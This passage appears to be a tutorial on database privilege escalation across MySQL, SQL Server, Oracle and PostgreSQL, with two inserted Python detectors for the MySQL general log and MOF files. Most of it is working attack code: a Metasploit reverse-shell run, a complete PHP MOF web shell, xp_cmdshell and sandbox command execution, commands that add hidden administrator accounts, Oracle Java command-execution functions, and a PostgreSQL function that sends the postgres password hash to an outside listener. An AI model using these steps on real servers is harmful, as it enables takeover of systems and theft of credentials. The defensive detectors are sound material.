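From the defender's side, every statement the UDF walkthrough above depends on (a file written with INTO DUMPFILE, a CREATE FUNCTION ... SONAME binding a library, then calls to the new function) is recorded in the MySQL general log. The detector below is an added example, not code from the original post; it assumes the MySQL 5.7+ general-log line layout and runs over constructed log lines.

```python
"""Flag UDF privilege-escalation activity in MySQL general-log lines.

Added example, not part of the original post. It looks for the statements the
walkthrough above relies on: a file written with INTO DUMPFILE / INTO OUTFILE,
a CREATE FUNCTION ... SONAME that binds a shared library, and later calls to a
function created that way. The MySQL 5.7+ general-log line layout is assumed
(timestamp, thread id, command, argument); the sample log lines are constructed.
"""
import re

LOG_LINE_RE = re.compile(r"^(?P<ts>\S+)\s+(?P<tid>\d+)\s+(?P<cmd>\w+)\s*(?P<arg>.*)$")
FILE_WRITE_RE = re.compile(r"INTO\s+(?:DUMPFILE|OUTFILE)\s+'([^']*)'", re.IGNORECASE)
SONAME_RE = re.compile(
    r"CREATE\s+(?:AGGREGATE\s+)?FUNCTION\s+`?(\w+)`?\s+RETURNS\s+\w+\s+SONAME\s+'([^']*)'",
    re.IGNORECASE)
# Function names exported by the common UDF libraries (lib_mysqludf_sys, cmdshell).
KNOWN_UDFS = {"sys_eval", "sys_exec", "cmdshell"}
# Extensions that mean a dropped library or MOF file rather than a data export.
BINARY_EXT = (".dll", ".so", ".mof")


def scan_general_log(lines):
    """Return one finding dict per suspicious Query line, in log order."""
    findings = []
    udf_names = set(KNOWN_UDFS)  # grows as CREATE FUNCTION ... SONAME statements are seen
    for line in lines:
        m = LOG_LINE_RE.match(line)
        if not m or m.group("cmd").lower() != "query":
            continue  # header line, Connect/Quit records, etc.
        tid, sql = m.group("tid"), m.group("arg")
        fw = FILE_WRITE_RE.search(sql)
        if fw:
            path = fw.group(1)
            findings.append({"tid": tid, "rule": "file_write", "detail": path,
                             "severity": "high" if path.lower().endswith(BINARY_EXT) else "medium"})
        sn = SONAME_RE.search(sql)
        if sn:
            udf_names.add(sn.group(1).lower())
            findings.append({"tid": tid, "rule": "udf_bind", "severity": "high",
                             "detail": f"{sn.group(1)} -> {sn.group(2)}"})
            continue
        called = sorted(n for n in udf_names if re.search(rf"\b{n}\s*\(", sql, re.IGNORECASE))
        if called:
            findings.append({"tid": tid, "rule": "udf_call", "severity": "high",
                             "detail": ", ".join(called)})
    return findings


# Constructed sample: thread 12 performs the UDF steps described above; thread 13
# is an unrelated application query.
SAMPLE_LOG = """\
Time                 Id Command    Argument
2024-05-01T08:00:01.000000Z\t   12 Connect\troot@192.168.72.100 on mysql using TCP/IP
2024-05-01T08:00:02.000000Z\t   12 Query\tselect @@plugin_dir, @@secure_file_priv
2024-05-01T08:00:03.000000Z\t   12 Query\tselect @dll into dumpfile 'C:/MySQL/lib/plugin/udf.dll'
2024-05-01T08:00:04.000000Z\t   12 Query\tcreate function sys_eval returns string soname 'udf.dll'
2024-05-01T08:00:05.000000Z\t   12 Query\tselect sys_eval('whoami')
2024-05-01T08:00:06.000000Z\t   13 Query\tselect id, name from app.users where id = 7
"""

if __name__ == "__main__":
    for f in scan_general_log(SAMPLE_LOG.splitlines()):
        print(f"[{f['severity']}] thread {f['tid']}: {f['rule']} {f['detail']}")
```

The general log must be enabled (general_log=ON) for these lines to exist; in production the same rules apply equally to audit-plugin output.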
    2. MOF privilege escalation

      1. Background

        1. MOF is a Windows system file (c:/windows/system32/wbem/mof/nullevt.mof) in "Managed Object Format"; it monitors process creation and termination every five seconds. The technique uses MySQL root privileges to write an uploaded MOF file; after a while the MOF is executed. It contains a VBS script segment, which is usually a cmd command that adds an administrator user. [MOF privilege escalation only works on Windows; it cannot be used on Linux]
        2. xp_cmdshell is enabled by default in MSSQL 2000 and disabled by default from MSSQL 2005 onward. A user with the sa administrator privilege can re-enable it with sp_configure.
      2. Conditions

        1. MySQL has read/write access to C:/Windows/system32/wbem/mof
        2. The secure-file-priv parameter is not null
        3. Applies to win2003 and earlier versions
      3. Reproduction

        1. msf tool
          1. Use msf to escalate privileges


            1.  use exploit/windows/mysql/mysql_mof
              
               # set the payload
               set payload windows/meterpreter/reverse_tcp
              
               # set the basic information of the target MySQL
               set rhosts 192.168.72.139
               set username root
               set password root
               run
              
        2. php script privilege escalation
          1. Upload the script to a web-accessible path and connect with the database account and password

            1. image

            2. Escalation script:

              1.  <?php 
                 $path="c:/ini.txt"; 
                 session_start(); 
                 if(!empty($_POST['submit'])){ 
                 setcookie("connect"); 
                 setcookie("connect[host]",$_POST['host']); 
                 setcookie("connect[user]",$_POST['user']); 
                 setcookie("connect[pass]",$_POST['pass']); 
                 setcookie("connect[dbname]",$_POST['dbname']); 
                 echo "<script>location.href='?action=connect'</script>"; 
                 } 
                 if(empty($_GET["action"])){ 
                 ?> 
                
                 <html> 
                 <head><title>Win MOF Shell</title></head> 
                 <body> 
                 <form action="?action=connect" method="post"> 
                 Host: 
                 <input type="text" name="host" value="127.0.0.1"><br/> 
                 User: 
                 <input type="text" name="user" value="root"><br/> 
                 Pass: 
                 <input type="password" name="pass" value="root"><br/> 
                 DB:   
                 <input type="text" name="dbname" value="mysql"><br/> 
                 <input type="submit" name="submit" value="Submit"><br/> 
                 </form> 
                 </body> 
                 </html> 
                
                 <?php 
                 exit; 
                 } 
                 if ($_GET[action]=='connect') 
                 { 
                 $conn=mysql_connect($_COOKIE["connect"]["host"],$_COOKIE["connect"]["user"],$_COOKIE["connect"]["pass"])  or die('<pre>'.mysql_error().'</pre>'); 
                 echo "<form action='' method='post'>"; 
                 echo "Cmd:"; 
                 echo "<input type='text' name='cmd' value='$strCmd'?>"; 
                 echo "<br>"; 
                 echo "<br>"; 
                 echo "<input type='submit' value='Exploit'>"; 
                 echo "</form>"; 
                 echo "<form action='' method='post'>"; 
                 echo "<input type='hidden' name='flag' value='flag'>"; 
                 echo "<input type='submit'value=' Read  '>"; 
                 echo "</form>"; 
                 if (isset($_POST['cmd'])){ 
                 $strCmd=$_POST['cmd']; 
                 $cmdshell='cmd /c '.$strCmd.'>'.$path; 
                 $mofname="c:/windows/system32/wbem/mof/system.mof"; 
                 $payload = "#pragma namespace(\"\\\\\\\\\\\\\\\\.\\\\\\\\root\\\\\\\\subscription\") 
                
                 instance of __EventFilter as \$EventFilter 
                 { 
                   EventNamespace = \"Root\\\\\\\\Cimv2\"; 
                   Name  = \"filtP2\"; 
                   Query = \"Select * From __InstanceModificationEvent \" 
                       \"Where TargetInstance Isa \\\\\"Win32_LocalTime\\\\\" \" 
                       \"And TargetInstance.Second = 5\"; 
                   QueryLanguage = \"WQL\"; 
                 }; 
                
                 instance of ActiveScriptEventConsumer as \$Consumer 
                 { 
                   Name = \"consPCSV2\"; 
                   ScriptingEngine = \"JScript\"; 
                   ScriptText = 
                   \"var WSH = new ActiveXObject(\\\\\"WScript.Shell\\\\\")\\\\nWSH.run(\\\\\"$cmdshell\\\\\")\"; 
                 }; 
                
                 instance of __FilterToConsumerBinding 
                 { 
                   Consumer = \$Consumer; 
                   Filter = \$EventFilter; 
                 };"; 
                 mysql_select_db($_COOKIE["connect"]["dbname"],$conn); 
                 $sql1="select '$payload' into dumpfile '$mofname';"; 
                 if(mysql_query($sql1)) 
                   echo "<hr>Execute Successful!<br> Please click the read button to check the  result!!<br>If the result is not correct,try read again later<br><hr>"; else die(mysql_error()); 
                 mysql_close($conn); 
                 } 
                
                 if(isset($_POST['flag'])) 
                 { 
                   $conn=mysql_connect($_COOKIE["connect"]["host"],$_COOKIE["connect"]["user"],$_COOKIE["connect"]["pass"])  or die('<pre>'.mysql_error().'</pre>'); 
                   $sql2="select load_file(\"".$path."\");"; 
                   $result2=mysql_query($sql2); 
                   $num=mysql_num_rows($result2); 
                   while ($row = mysql_fetch_array($result2, MYSQL_NUM)) { 
                     echo "<hr/>"; 
                     echo '<pre>'. $row[0].'</pre>'; 
                   } 
                   mysql_close($conn); 
                 } 
                 } 
                 ?>
                
          2. Once connected, arbitrary commands can be executed

            1. image
          3. Next, maintain access

            1. Create a hidden user: net user cong$ 12456 /add & net localgroup administrators cong$ /add
            2. image
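The payload the script above writes registers a permanent WMI subscription: an __EventFilter, an ActiveScriptEventConsumer and the __FilterToConsumerBinding that joins them. The parser below is an added example, not the post's code; it reads a .mof file found under wbem\mof and reports, for each binding, the WQL trigger and the command that would run, using a sample constructed from the script's template.

```python
"""List the WMI event subscriptions a .mof file would register. Added example,
not part of the original post: regex-based, it handles the instance/property
layout of the payload above rather than the full MOF grammar."""
import re

INSTANCE_RE = re.compile(
    r"instance\s+of\s+(?P<cls>\w+)(?:\s+as\s+\$(?P<alias>\w+))?\s*\{(?P<body>.*?)\};",
    re.DOTALL | re.IGNORECASE)
# value = adjacent string literals | $alias reference | bare token
PROP_RE = re.compile(
    r'(?P<name>\w+)\s*=\s*(?P<value>(?:"(?:[^"\\]|\\.)*"\s*)+|\$\w+|[^;]+);', re.DOTALL)
SCRIPT_CONSUMERS = {"activescripteventconsumer", "commandlineeventconsumer"}

def _decode_value(raw):
    """Join adjacent string literals and decode MOF's C-style backslash escapes."""
    raw = raw.strip()
    parts = re.findall(r'"((?:[^"\\]|\\.)*)"', raw, re.DOTALL)
    if not parts:                      # $alias reference or bare number
        return raw
    return "".join(re.sub(r"\\(.)", lambda m: {"n": "\n", "t": "\t"}.get(m.group(1), m.group(1)), p)
                   for p in parts)

def parse_mof(text):
    """Return [{cls, alias, props}] for every 'instance of' block in the text."""
    return [{"cls": m.group("cls"), "alias": m.group("alias"),
             "props": {p.group("name"): _decode_value(p.group("value"))
                       for p in PROP_RE.finditer(m.group("body"))}}
            for m in INSTANCE_RE.finditer(text)]

def find_subscriptions(text):
    """Resolve each __FilterToConsumerBinding to its trigger query and payload."""
    instances = parse_mof(text)
    by_alias = {i["alias"]: i for i in instances if i["alias"]}
    findings = []
    for inst in instances:
        if inst["cls"].lower() != "__filtertoconsumerbinding":
            continue
        consumer = by_alias.get(inst["props"].get("Consumer", "").lstrip("$"))
        filt = by_alias.get(inst["props"].get("Filter", "").lstrip("$"))
        if consumer is None or filt is None:
            continue                   # bound to an instance defined in another file
        payload = consumer["props"].get("ScriptText") or consumer["props"].get("CommandLineTemplate", "")
        run = re.search(r'\.run\("([^"]*)"', payload, re.IGNORECASE)  # JScript WScript.Shell.run(...)
        findings.append({"consumer_class": consumer["cls"],
                         "suspicious": consumer["cls"].lower() in SCRIPT_CONSUMERS,
                         "filter_query": filt["props"].get("Query", ""),
                         "command": run.group(1) if run else payload})
    return findings

# Constructed sample: the script's template as written to system.mof, with the
# command filled in the way the script does (cmd /c <cmd> > c:/ini.txt).
SAMPLE_MOF = r'''#pragma namespace("\\\\.\\root\\subscription")
instance of __EventFilter as $EventFilter {
  EventNamespace = "Root\\Cimv2";
  Name = "filtP2";
  Query = "Select * From __InstanceModificationEvent "
          "Where TargetInstance Isa \"Win32_LocalTime\" "
          "And TargetInstance.Second = 5";
  QueryLanguage = "WQL";
};
instance of ActiveScriptEventConsumer as $Consumer {
  Name = "consPCSV2";
  ScriptingEngine = "JScript";
  ScriptText = "var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"cmd /c whoami>c:/ini.txt\")";
};
instance of __FilterToConsumerBinding { Consumer = $Consumer; Filter = $EventFilter; };'''
```

On a live host the same three classes can be listed directly from the root\subscription namespace to confirm whether a dropped file was actually compiled.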
    3. sqlserver privilege escalation

      1. Background

        1. In SQL Server, an attacker who obtains the password of the sa (system administrator) account effectively already holds very high privileges: sa is the SQL Server superuser with full control over the database server.

        2. Whether operating-system commands can be executed, in particular through SQL Server's xp_cmdshell or other mechanisms, depends on the SQL Server configuration and on the security settings of the Windows account under which SQL Server runs.

        3. Sensitive file names

          1.  web.config 
             config.asp 
             conn.aspx 
             database.aspx
            
      2. Conditions

        1. The server has the database service enabled
        2. The password of the highest-privilege user has been obtained
          (apart from Access, privilege escalation is possible with nearly every database)
      3. xp_cmdshell privilege escalation

        1. Reproduction
          1. Connect to the database and execute the statements

            1. Enable xp_cmdshell

              1.  EXEC sp_configure 'show advanced options', 1
                 RECONFIGURE;
                 EXEC sp_configure 'xp_cmdshell', 1;
                 RECONFIGURE;
                
            2. Run commands with EXEC master.dbo.xp_cmdshell 'whoami'

      4. Sandbox privilege escalation

        1. Introduction
          1. Sandbox mode is a security feature of the database. In sandbox mode, only expressions in control and field properties that are safe and contain no malicious code are evaluated; an expression is considered safe if it does not use functions or properties that could damage data in some way. Prerequisites for exploitation: a SQL Server sysadmin account whose server process runs as system (SQL Server 2019 is downgraded to mssql by default), and the server has the jet.oledb.4.0 driver.

          2. Limitations: (1) Microsoft.jet.oledb.4.0 is generally only available on 32-bit operating systems. (2) Windows 2008 and later ship no Access database file by default, so one must be uploaded; SQL Server 2015 disables Ad Hoc Distributed Queries by default, so it must be enabled.

          3. Meaning of the sandbox mode SandBoxMode parameter (default is 2)

            0: sandbox mode disabled for any owner

            1: only within the permitted scope

            2: must be in Access mode

            3: fully enabled

        2. Reproduction
          1. Run the following two commands to enable advanced options


            1.  exec sp_configure 'show advanced options',1;reconfigure;
               exec sp_configure 'Ad Hoc Distributed Queries',1;reconfigure;
              
          2. Modify the registry

            1. exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',0;
          3. Use the SQL Server extended stored procedure xp_regread to read the SandBoxMode value from the Windows registry.

            1. exec master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode';
          4. Execute system commands

            1.  select * from openrowset('microsoft.jet.oledb.4.0',';database=c:/windows/system32/ias/ias.mdb','select shell("net user qianxun 123456 /add")')
               select * from openrowset('microsoft.jet.oledb.4.0',';database=c:/windows/system32/ias/ias.mdb','select shell("net localgroup administrators qianxun /add")')
              
          5. Restore the configuration

            1.  exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1;
               exec sp_configure 'Ad Hoc Distributed Queries',0;reconfigure;
               exec sp_configure 'show advanced options',0;reconfigure;
              

Oracle privilege escalation

  1. Lab setup

    1. Prepare an Oracle lab environment

    2. Enter the database: sqlplus /nolog

    3. Connect as the database administrator: conn / as sysdba

    4. Create a low-privilege user: create user test identified by test;

      1. image
    5. Also obtain the Java permission


      1.  DECLARE
             POL DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY;
             CURSOR C1 IS SELECT 'GRANT', 'ZTZ', 'SYS', 'java.io.FilePermission', '<<ALL FILES>>', 'execute', 'ENABLED' FROM DUAL;
          BEGIN
             OPEN C1;
             FETCH C1 BULK COLLECT INTO POL;
             CLOSE C1;
             DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL);
          END;
          /
        
    6. To execute arbitrary code, the java.lang.RuntimePermission permission is additionally required

      1.  DECLARE
             POL DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY;
             CURSOR C1 IS SELECT 'GRANT', USER(), 'SYS', 'java.lang.RuntimePermission', 'writeFileDescriptor', 'NULL', 'ENABLED' FROM DUAL;
          BEGIN
             OPEN C1;
             FETCH C1 BULK COLLECT INTO POL;
             CLOSE C1;
             DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL);
          END;
          /

          DECLARE
             POL DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY;
             CURSOR C1 IS SELECT 'GRANT', USER(), 'SYS', 'java.lang.RuntimePermission', 'readFileDescriptor', 'NULL', 'ENABLED' FROM DUAL;
          BEGIN
             OPEN C1;
             FETCH C1 BULK COLLECT INTO POL;
             CLOSE C1;
             DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL);
          END;
          /
        
  2. Execute arbitrary commands

    1. Reproduction
      1. Create the Java package

        1. select dbms_xmlquery.newcontext('declare PRAGMA AUTONOMOUS_TRANSACTION;begin execute immediate ''create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}}'';commit;end;') from dual;
      2. Obtain the Java permission

        1. select dbms_xmlquery.newcontext('declare PRAGMA AUTONOMOUS_TRANSACTION;begin execute immediate ''begin dbms_java.grant_permission( ''''SYSTEM'''', ''''SYS:java.io.FilePermission'''', ''''<<all>'''',''''EXECUTE'''');end;''commit;end;') from dual;
      3. Create the command-execution function

        1.  select dbms_xmlquery.newcontext('declare PRAGMA AUTONOMOUS_TRANSACTION;begin execute immediate ''create or replace function LinxRunCMD(p_cmd in varchar2) return varchar2 as language java name ''''LinxUtil.runCMD(java.lang.String) return String''''; '';commit;end;') from dual;

      4. Execute a command: select LinxRUNCMD('whoami') from dual;

  3. Privilege escalation by injecting a stored procedure (low privilege to DBA)

    1. Principle
      1. A stored procedure created by SYS contains a SQL injection. A user with the create procedure privilege creates an escalation function and injects it into the stored procedure; the procedure then calls that function, which executes grant dba to quan, yielding Oracle DBA privileges
    2. Preconditions
      1. A stored procedure created by SYS has a SQL injection (e.g. CVE-2005-4832)
      2. The user has the create procedure privilege (to create the function)
    3. Reproduction
      1. Create a Java class, then wrap it in a procedure for calling


        1.  create or replace and resolve java source named JAVACMD as
              import java.lang.*;
              import java.io.*;
              public class JAVACMD
              {
                 public static void execmd(String command) throws IOException
                 {
                         Runtime.getRuntime().exec(command);
                 }
              }
              /
          
      2. Create the wrapper procedure that calls it

        1.  create or replace procedure MYJAVACMD(command in varchar) as language java
              name 'JAVACMD.execmd(java.lang.String)';
            /

      3. Execute a command

        1.  EXEC MYJAVACMD('net user cong cong /add');

      4. image

PostgreSQL privilege escalation

  1. Introduction

    1. PostgreSQL is a relational database. Versions 9.3 through 10 contain a logic error that lets a superuser unknowingly trigger malicious code created by an ordinary user, resulting in unexpected operations.
  2. Reproduction

    1. Privilege escalation by creating a function
      2. Lab: vulhub postgres/CVE-2018-1058

      3. Connect as an ordinary user: psql --host 192.168.72.130 --username vulhub (vulhub/vulhub)

      4. Run the following statement (replace the listener ip and port with your own)


        1.  CREATE FUNCTION public.array_to_string(anyarray,text) RETURNS TEXT AS $$
               select dblink_connect((select 'hostaddr=192.168.1.7 port=1234 user=postgres password=chybeta sslmode=disable dbname='||(SELECT passwd FROM pg_shadow WHERE usename='postgres'))); 
               SELECT pg_catalog.array_to_string($1,$2);
           $$ LANGUAGE SQL VOLATILE;
          
      5. Listen on the port: nc -lvvp 1234

      6. Simulate the superuser running pg_dump: docker-compose exec postgres pg_dump -U postgres -f evil.bak vulhub; the backdoor is triggered

        1. image
    2. High-privilege escalation
      1. Introduction
        1. PostgreSQL is a powerful object-relational database management system (ORDBMS). Version 9.3 added a "COPY TO/FROM PROGRAM" feature that allows the database superuser and any member of the pg_read_server_files group to execute operating-system commands
      2. Affected versions
        1. 9.3-11.2
      3. Reproduction
        1. Lab: vulfocus postgresql command execution (cve-2019-9193) 123.58.224.8:31404 31404:5432

        2. Connect to the database as postgres/postgres

        3. Drop the table if it already exists: DROP TABLE IF EXISTS cmd_exec

          1. image
        4. Create the table that receives command output: CREATE TABLE cmd_exec(cmd_output text);

          1. image
        5. Execute a system command: COPY cmd_exec FROM PROGRAM 'whoami'

          1. image
        6. Display the result: SELECT * FROM cmd_exec

          1. image
